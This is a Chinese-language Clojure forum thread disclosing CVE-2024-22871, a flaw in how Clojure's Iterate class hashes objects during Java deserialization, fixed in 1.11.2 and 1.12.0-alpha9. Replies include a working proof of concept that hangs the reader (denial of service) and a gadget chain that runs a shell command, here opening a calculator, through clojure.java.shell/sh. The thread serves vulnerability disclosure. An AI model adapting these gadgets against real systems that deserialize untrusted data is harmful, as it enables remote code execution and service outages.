2024 Clojure 状态调查!中分享您的看法

欢迎!请查看关于页面以获取更多有关如何操作的信息。

+1
Clojure
已关闭

报告漏洞

在 org.clojure:clojure 中存在以下漏洞:
- 拒绝服务攻击(clojure 版本 1.2.0 - 1.12.0)

dos

Command Injection

请注意,此漏洞不需要额外的组件。

详细信息
1.12.0-a5 中的 RCE CallGraph
17069252746231706925273707.png

CVE
- CVE-2024-22871

已在 Clojure 1.11.2 和 1.12.0-alpha9 中关闭: 已发布
如以下讨论所述,DoS 攻击可能会影响 1.2.0-1.12.0,而带有本地验证的命令执行可能会影响 1.9.0-1.12.0
在我看来,几个目前的问题与以下情况类似,但却是绕过的全新方式。


https://clojure.atlassian.net/browse/CLJ-2204
by
编辑了 by
我不明白,它与Java有关,所有的clojure都是吗?

更新:我是否理解正确,您可以在不使用clojure的情况下用Java实现同样的操作?
by
没有正确完成,函数调用图部分依赖于clojure,如apply、RestFn等。$fn_5920可以在Clojure中通过访问匿名函数类在1.9.0-1.12.0(在clojure版本poc)版本中执行命令。

1 答案

+3 投票
by
被选中 by
 
最佳答案

在不受信任的数据上使用`ObjectInputStream`是固有的危险,正如该类的文档自己所说。为什么该类的危险展示会被视为提供一些使用类JAR的漏洞?

为未来的读者提供了一种更简单的方法来重现。

(let [out (java.io.ByteArrayOutputStream.)
      obj-out (java.io.ObjectOutputStream. out)
      i (iterate identity nil)]
  (doto (-> i (class) (.getSuperclass) (.getDeclaredField "_hash"))
    (.setAccessible true)
    (.set i (int 1)))
  (.writeObject obj-out (java.util.HashMap. {i nil}))
  (println "Writing is done. Reading...")
  (let [in (java.io.ByteArrayInputStream. (.toByteArray out))
        obj-in (java.io.ObjectInputStream. in)]
    (.readObject obj-in)
    (println "Will never be printed.")))
by
编辑 by
另一种生成命令执行攻击的方法

```clojure
(ns poc.clojure.command
  (:import (clojure.lang PersistentQueue)
           (java.util HashMap ArrayList))
  (:require clojure.java.process))

(defn set-private-field [obj field-name value]
  (let [field (-> (.getClass obj)
                  (.getDeclaredField field-name))]
    (.setAccessible field true)
    (.set field obj value)))

(defn modify-and-process-model [iterate]
  ;; 创建 PersistentQueue
  (let [model (PersistentQueue/EMPTY)]
    ;; 使用 set-private-field 修改 model
    (set-private-field model "f" iterate)
    ;; 返回修改后的 model
    model))

(defn main []
  ;; 创建 HashMap
  (let [map (HashMap.)
        args ["open" "-a" "calculator"]
        ;; 使用 ns-resolve 获取 start 函数并使用 partial 创建部分应用函数
        fn_start (ns-resolve 'clojure.java.shell 'sh)
        partial-fn (partial apply fn_start)
        ;; 使用 clojure.core/iterate 创建 iterate 实例
        iterate-instance (iterate partial-fn args)]

    (let [model (modify-and-process-model iterate-instance)]
      (set-private-field model "_hash" (int 1))
      (.put map model nil)
      (set-private-field model "_hash" (int 0)))

    ;; 序列化 map
    (let [out (java.io.ByteArrayOutputStream.)
          obj-out (java.io.ObjectOutputStream. out)]
      (.writeObject obj-out map)
      (println "写入完成。读取中...")

      ;; 反序列化
      (let [in (java.io.ByteArrayInputStream. (.toByteArray out))
            obj-in (java.io.ObjectInputStream. in)]
        (.readObject obj-in)))
    )
  )

  ;; 调用 main 函数
(main)
```
by
需要注意的是,在仅仅设置 'fn start (ns-resolve 'clojure.java.shell 'sh)' 之后,它将影响 1.9.0 - 1.12.0 版本,并且可以实现命令执行。
by
不明白您最后一条评论的意思。`clojure.java.shell` 命名空间中的 `sh` 函数用于外部壳操作和运行命令,因此当然可以使用它来运行一些东西。命令执行机制仍然依赖于 `Iterate` 类实现哈希的方式。
by
这是因为我在上一个版本中使用了process $ start,但遗憾的是,这是1.12.0版中引入的新函数;后来检查项目发现,可以直接使用shell函数直接运行命令。是的,问题仍然出现在Iterate类的哈希计算中。
by
这个问题已在1.11.2和1.12.0-alpha9版本的Iterate hashCode() 中修复。
...